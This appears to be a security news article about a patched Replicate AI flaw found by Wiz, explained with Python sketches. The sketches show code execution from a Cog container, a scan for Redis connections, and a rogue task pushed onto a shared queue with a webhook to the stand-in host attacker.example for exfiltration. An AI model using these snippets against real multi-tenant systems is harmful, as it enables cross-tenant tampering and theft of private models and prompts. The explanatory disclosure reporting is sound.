Researchers found a serious security vulnerability in the Replicate AI platform that put customers' AI models at risk. The vendor patched the flaw following the bug report, so it no longer poses a threat, but it illustrates how severe a vulnerability affecting AI models can be.

Replicate AI vulnerability exposed the risks to AI models.

According to a recent post from cloud security firm Wiz, its researchers found a serious security issue in Replicate AI.

Replicate AI is an AI-as-a-service provider that lets customers run machine learning models at scale in the cloud. It provides the computational resources to run open-source AI models, giving AI enthusiasts greater personalization and the freedom to experiment with AI the way they want.
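For context, models on Replicate are packaged with Cog, Replicate's open-source containerization tool. A minimal predictor looks roughly like the sketch below (the model logic here is a placeholder); the key point is that a Cog container bundles arbitrary Python code alongside the model weights.

```python
# predict.py -- a minimal Cog predictor (paired with a cog.yaml build file).
# The "model" below is a stand-in for illustration, not a real model.
from cog import BasePredictor, Input


class Predictor(BasePredictor):
    def setup(self):
        # Normally you would load model weights from disk here.
        self.prefix = "echo: "

    def predict(self, prompt: str = Input(description="Text to process")) -> str:
        # Normally this would run inference; here it just echoes the input.
        return self.prefix + prompt
```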

Regarding the vulnerability, Wiz's post describes a flaw in the Replicate AI platform that an adversary could exploit to threaten other customers' AI models. Specifically, an adversary could create a malicious Cog container, upload it to the platform, and then use it to achieve remote code execution through Replicate AI's interface. After obtaining RCE, the researchers performed lateral movement across the infrastructure, demonstrating how a real attacker would proceed.
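Wiz has not published its exploit container, but the underlying idea is straightforward: whatever code a Cog container ships gets executed on the platform's compute when the container starts. A harmless sketch of that property:

```python
# Sketch only: code in setup() runs on the platform's infrastructure as soon
# as the container is started, which is why running an untrusted container
# amounts to remote code execution. This example runs a benign command.
import subprocess

from cog import BasePredictor, Input


class Predictor(BasePredictor):
    def setup(self):
        # An attacker could run arbitrary commands here; we run a harmless one.
        result = subprocess.run(["id"], capture_output=True, text=True)
        print("running as:", result.stdout.strip())

    def predict(self, prompt: str = Input(description="Unused")) -> str:
        return "done"
```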

In short, they leveraged their initial RCE privileges to examine the contents of an established TCP connection to a Redis instance within a Kubernetes cluster hosted on Google Cloud Platform.
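Wiz's write-up does not include its tooling, but from inside a Linux container, candidate connections like this can be enumerated by parsing /proc/net/tcp. A rough sketch, assuming Redis listens on its default port 6379:

```python
# Sketch: list remote endpoints of ESTABLISHED TCP connections to port 6379,
# as a process inside the container could. Port 6379 is an assumption
# (the Redis default); Wiz has not published the actual details.
import socket
import struct

REDIS_PORT = 6379


def established_redis_peers(path="/proc/net/tcp"):
    peers = []
    with open(path) as f:
        next(f)  # skip the header row
        for line in f:
            fields = line.split()
            remote, state = fields[2], fields[3]
            if state != "01":  # "01" means ESTABLISHED
                continue
            host_hex, port_hex = remote.split(":")
            if int(port_hex, 16) != REDIS_PORT:
                continue
            # /proc/net/tcp stores IPv4 addresses as little-endian hex
            ip = socket.inet_ntoa(struct.pack("<I", int(host_hex, 16)))
            peers.append((ip, REDIS_PORT))
    return peers


if __name__ == "__main__":
    for ip, port in established_redis_peers():
        print(f"{ip}:{port}")
```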

Because these Redis instances serve multiple customers, the researchers realized they could mount a cross-tenant data-access attack and interfere with the responses other users should receive by injecting arbitrary data packets. Injecting packets into the already-established connection let them bypass Redis's authentication requirement and insert rogue tasks capable of tampering with other customers' AI models.
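The actual attack injected packets into the already-authenticated TCP stream, which is what sidestepped Redis authentication. To convey the effect rather than the packet-level mechanics, the sketch below uses the redis-py client directly; the queue name, host address, and task schema are all hypothetical:

```python
# Sketch: what inserting a rogue task into a shared job queue would look
# like. Every name here is illustrative -- Wiz did not publish the real
# queue names, internal addresses, or task format.
import json

import redis  # third-party redis-py client

QUEUE = "prediction-queue"                    # hypothetical shared queue
r = redis.Redis(host="10.0.0.5", port=6379)   # hypothetical internal address

rogue_task = {
    "model": "victim-org/private-model",            # hypothetical target
    "webhook": "https://attacker.example/collect",  # exfiltration endpoint
}
# LPUSH puts the crafted task onto the shared queue, where a worker
# serving another tenant would pick it up and act on it.
r.lpush(QUEUE, json.dumps(rogue_task))
```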

Regarding the potential impact of this flaw, the researchers said,

An attacker could query customers' private AI models, potentially revealing proprietary knowledge or sensitive data involved in the model training process. Additionally, intercepting prompts could expose sensitive data, including personally identifiable information (PII).

Replicate AI deployed mitigations.

After this discovery, the researchers responsibly disclosed the issue to Replicate AI, which fixed the flaw. According to their post, Replicate AI deployed complete mitigations and further strengthened security with additional hardening. The vendor also assured that there had been no attempts to exploit the vulnerability.

Additionally, the vendor announced the implementation of encryption on all inbound traffic and restrictions on privileged network access for all model containers.
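On the client side, hardening like this typically means internal Redis connections that are both encrypted and authenticated, so a hijacked plaintext socket is no longer useful. A rough sketch with redis-py, where the host, port, and credential names are assumptions rather than Replicate's actual configuration:

```python
# Sketch: a TLS-encrypted, authenticated Redis connection. All names and
# paths below are placeholders for illustration only.
import os

import redis  # third-party redis-py client

r = redis.Redis(
    host="redis.internal.example",          # hypothetical internal hostname
    port=6380,                              # common TLS port for Redis
    ssl=True,                               # encrypt traffic in transit
    ssl_ca_certs="/etc/ssl/internal-ca.pem",  # pin the internal CA
    username="queue-worker",                # per-service account
    password=os.environ["REDIS_PASSWORD"],  # pulled from a secret store
)
r.ping()  # fails if the certificate or credentials do not check out
```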

Let us know your thoughts in the comments.


